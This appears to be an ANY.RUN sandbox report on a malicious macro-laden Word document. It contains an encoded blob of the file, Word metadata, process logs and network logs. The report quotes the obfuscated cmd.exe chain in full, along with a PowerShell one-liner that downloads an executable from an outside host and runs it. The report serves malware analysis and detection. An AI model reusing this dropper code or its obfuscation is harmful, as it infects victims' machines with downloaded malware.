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
WordDocumentDocSuppDataBinDataName: editdata.mso
WordDocumentDivsDivDivBdrRightColor: auto
WordDocumentDivsDivDivBdrRightSpace: -
WordDocumentDivsDivDivBdrRightBdrwidth: -
WordDocumentDivsDivDivBdrRightSz: -
WordDocumentDivsDivDivBdrRightVal: none
WordDocumentDivsDivDivBdrBottomColor: auto
WordDocumentDivsDivDivBdrBottomSpace: -
WordDocumentDivsDivDivBdrBottomBdrwidth: -
WordDocumentDivsDivDivBdrBottomSz: -
WordDocumentDivsDivDivBdrBottomVal: none
WordDocumentDivsDivDivBdrLeftColor: auto
WordDocumentDivsDivDivBdrLeftSpace: -
WordDocumentDivsDivDivBdrLeftBdrwidth: -
WordDocumentDivsDivDivBdrLeftSz: -
WordDocumentDivsDivDivBdrLeftVal: none
WordDocumentDivsDivDivBdrTopColor: auto
WordDocumentDivsDivDivBdrTopSpace: -
WordDocumentDivsDivDivBdrTopBdrwidth: -
WordDocumentDivsDivDivBdrTopSz: -
WordDocumentDivsDivDivBdrTopVal: none
WordDocumentDivsDivMarBottomVal: -
WordDocumentDivsDivMarTopVal: -
WordDocumentDivsDivMarRightVal: -
WordDocumentDivsDivMarLeftVal: -
WordDocumentDivsDivBodyDivVal: on
WordDocumentDivsDivId: 946541782
WordDocumentStylesStyleLinkVal: NoSpacingChar
WordDocumentStylesStyleRPrRFontsCs: Courier New
WordDocumentStylesStylePPrShdFill: auto
WordDocumentStylesStylePPrShdColor: 000000
WordDocumentStylesStylePPrShdVal: clear
WordDocumentStylesStylePPrPBdrRightColor: auto
WordDocumentStylesStylePPrPBdrRightSpace: -
WordDocumentStylesStylePPrPBdrRightBdrwidth: 20
WordDocumentStylesStylePPrPBdrRightSz: 8
WordDocumentStylesStylePPrPBdrRightVal: single
WordDocumentStylesStylePPrTextAlignmentVal: center
WordDocumentStylesStylePPrPBdrBottomColor: auto
WordDocumentStylesStylePPrPBdrBottomSpace: -
WordDocumentStylesStylePPrPBdrBottomBdrwidth: 20
WordDocumentStylesStylePPrPBdrBottomSz: 8
WordDocumentStylesStylePPrPBdrBottomVal: single
WordDocumentStylesStylePPrPBdrLeftColor: auto
WordDocumentStylesStylePPrPBdrLeftSpace: -
WordDocumentStylesStylePPrPBdrLeftBdrwidth: 20
WordDocumentStylesStylePPrPBdrLeftSz: 8
WordDocumentStylesStylePPrPBdrLeftVal: single
WordDocumentStylesStylePPrPBdrTopColor: auto
WordDocumentStylesStylePPrPBdrTopSpace: -
WordDocumentStylesStylePPrPBdrTopBdrwidth: 20
WordDocumentStylesStylePPrPBdrTopSz: 8
WordDocumentStylesStylePPrPBdrTopVal: single
WordDocumentStylesStyleRPrB-cs: -
WordDocumentStylesStyleRPrB: -
WordDocumentStylesStylePPrJcVal: right
WordDocumentStylesStyleRPrRFontsH-ansi: MS PMincho
WordDocumentStylesStyleRPrRFontsFareast: MS PMincho
WordDocumentStylesStyleRPrRFontsAscii: MS PMincho
WordDocumentStylesStylePPrSpacingAfter-autospacing: on
WordDocumentStylesStylePPrSpacingBefore-autospacing: on
WordDocumentStylesStylePPrSpacingBefore: 100
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleRPrUVal: single
WordDocumentStylesStyleRPrColorVal: 0000FF
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 276
WordDocumentStylesStylePPrSpacingAfter: 200
WordDocumentStylesStyleRsidVal: 00E57080
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontAltNameVal: MS 明朝
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 622
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 4
WordDocumentDocumentPropertiesCharacters: 531
WordDocumentDocumentPropertiesWords: 92
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:01:21 14:13:00Z
WordDocumentDocumentPropertiesCreated: 2019:01:21 14:13:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2960"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\p3254.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1144c:\i9815\c7482\z7069\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set dN=WUsCMw}oyz;16 '0kh83A5f2:/Ij${pOi=xe~d(Lgu4+TlE.@\t)n7%a9vNGPB-rSDc,mFb&&for %h in (30;7;5;54;60;1;61;39;26;3;24;36;21;67;11;54;63;54;64;46;64;64;26;31;58;58;20;4;46;24;36;62;42;67;11;54;17;54;44;46;4;60;24;36;62;19;67;11;54;45;45;13;28;66;42;11;53;11;33;14;41;21;19;19;53;14;10;28;5;53;12;18;53;33;52;35;5;62;7;70;27;35;66;50;13;58;35;50;47;0;35;70;3;45;32;35;52;50;10;28;70;12;12;42;12;33;14;17;50;50;30;24;25;25;35;41;50;35;63;7;47;35;2;66;63;32;50;7;63;35;2;66;55;52;50;55;70;63;7;2;47;66;7;68;25;53;18;23;19;42;47;70;32;52;14;47;64;30;45;32;50;38;14;48;14;51;10;28;68;56;42;42;33;14;57;21;53;12;12;14;10;28;55;53;18;23;19;13;33;13;14;12;12;42;14;10;28;2;19;23;42;56;33;14;7;11;23;53;53;14;10;28;5;53;12;11;53;33;28;35;52;57;24;50;35;68;30;43;14;49;14;43;28;55;53;18;23;19;43;14;47;35;34;35;14;10;22;7;63;35;55;66;17;38;28;22;21;21;11;21;13;32;52;13;28;70;12;12;42;12;51;29;50;63;8;29;28;5;53;12;18;53;47;65;7;5;52;45;7;55;37;69;32;45;35;38;28;22;21;21;11;21;67;13;28;5;53;12;11;53;51;10;28;30;11;21;23;21;33;14;9;18;53;11;19;14;10;26;22;13;38;38;59;35;50;62;26;50;35;68;13;28;5;53;12;11;53;51;47;45;35;52;40;50;17;13;62;40;35;13;42;15;15;15;15;51;13;29;26;52;57;7;16;35;62;26;50;35;68;13;28;5;53;12;11;53;10;28;37;56;15;53;53;33;14;9;19;42;15;56;14;10;70;63;35;55;16;10;6;6;66;55;50;66;17;29;6;6;28;55;53;53;11;33;14;5;12;15;18;15;14;10;72)do set dS6=!dS6!!dN:~%h,1!&&if %h gtr 71 echo !dS6:*dS6!=!|cmd.exe"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2748CmD /V/C"set dN=WUsCMw}oyz;16 '0kh83A5f2:/Ij${pOi=xe~d(Lgu4+TlE.@\t)n7%a9vNGPB-rSDc,mFb&&for %h in (30;7;5;54;60;1;61;39;26;3;24;36;21;67;11;54;63;54;64;46;64;64;26;31;58;58;20;4;46;24;36;62;42;67;11;54;17;54;44;46;4;60;24;36;62;19;67;11;54;45;45;13;28;66;42;11;53;11;33;14;41;21;19;19;53;14;10;28;5;53;12;18;53;33;52;35;5;62;7;70;27;35;66;50;13;58;35;50;47;0;35;70;3;45;32;35;52;50;10;28;70;12;12;42;12;33;14;17;50;50;30;24;25;25;35;41;50;35;63;7;47;35;2;66;63;32;50;7;63;35;2;66;55;52;50;55;70;63;7;2;47;66;7;68;25;53;18;23;19;42;47;70;32;52;14;47;64;30;45;32;50;38;14;48;14;51;10;28;68;56;42;42;33;14;57;21;53;12;12;14;10;28;55;53;18;23;19;13;33;13;14;12;12;42;14;10;28;2;19;23;42;56;33;14;7;11;23;53;53;14;10;28;5;53;12;11;53;33;28;35;52;57;24;50;35;68;30;43;14;49;14;43;28;55;53;18;23;19;43;14;47;35;34;35;14;10;22;7;63;35;55;66;17;38;28;22;21;21;11;21;13;32;52;13;28;70;12;12;42;12;51;29;50;63;8;29;28;5;53;12;18;53;47;65;7;5;52;45;7;55;37;69;32;45;35;38;28;22;21;21;11;21;67;13;28;5;53;12;11;53;51;10;28;30;11;21;23;21;33;14;9;18;53;11;19;14;10;26;22;13;38;38;59;35;50;62;26;50;35;68;13;28;5;53;12;11;53;51;47;45;35;52;40;50;17;13;62;40;35;13;42;15;15;15;15;51;13;29;26;52;57;7;16;35;62;26;50;35;68;13;28;5;53;12;11;53;10;28;37;56;15;53;53;33;14;9;19;42;15;56;14;10;70;63;35;55;16;10;6;6;66;55;50;66;17;29;6;6;28;55;53;53;11;33;14;5;12;15;18;15;14;10;72)do set dS6=!dS6!!dN:~%h,1!&&if %h gtr 71 echo !dS6:*dS6!=!|cmd.exe"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2628C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $c4171='u5337';$w7687=new-object Net.WebClient;$b6646='http://eutero.escritorescantabros.com/78234.bin'.Split('@');$m944='v5766';$a7823 = '664';$s3249='o1277';$w7617=$env:temp+'\'+$a7823+'.exe';foreach($f5515 in $b6646){try{$w7687.DownloadFile($f5515, $w7617);$p1525='z8713';If ((Get-Item $w7617).length -ge 40000) {Invoke-Item $w7617;$d9077='z3409';break;}}catch{}}$a771='w6080';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2708cmd.exeC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3132powershell $c4171='u5337';$w7687=new-object Net.WebClient;$b6646='http://eutero.escritorescantabros.com/78234.bin'.Split('@');$m944='v5766';$a7823 = '664';$s3249='o1277';$w7617=$env:temp+'\'+$a7823+'.exe';foreach($f5515 in $b6646){try{$w7687.DownloadFile($f5515, $w7617);$p1525='z8713';If ((Get-Item $w7617).length -ge 40000) {Invoke-Item $w7617;$d9077='z3409';break;}}catch{}}$a771='w6080';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 425
Read events
962
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
2960WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE9A8.tmp.cvr
MD5:
SHA256:
2960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C023E77.png
MD5:
SHA256:
2960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4A9F960C.png
MD5:
SHA256:
2960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\70F669D.png
MD5:
SHA256:
3132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SLT48OC4XVFMBIF6OGAL.temp
MD5:
SHA256:
2960WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$p3254.docpgc
MD5:5824F14E0F862A247BD30A1083ADA77C
SHA256:C13932E9C92262B31366455A7370EB3F24C34BF77AA16283985664153BFE6416
3132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f754.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
3132powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2960WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:FC392DFFEDE1007DA31485C7D94EE966
SHA256:4766E505D1A5CEB8316D39BA101ECBC8DADCDC6AF004A3F1A30BD34A5D42A3A4
2960WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:0EA4FED71645C6D74BF3C03D1E94DB97
SHA256:22D101B1125D9A35C0EA6BE189C39B3C3C27DFA9CDC99F54B729EEE5ACF4844A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3132
powershell.exe
GET
195.123.245.70:80
http://eutero.escritorescantabros.com/78234.bin
UA
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3132
powershell.exe
195.123.245.70:80
eutero.escritorescantabros.com
UA
unknown

DNS requests

Domain
IP
Reputation
eutero.escritorescantabros.com
  • 195.123.245.70
unknown

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
p3254.doc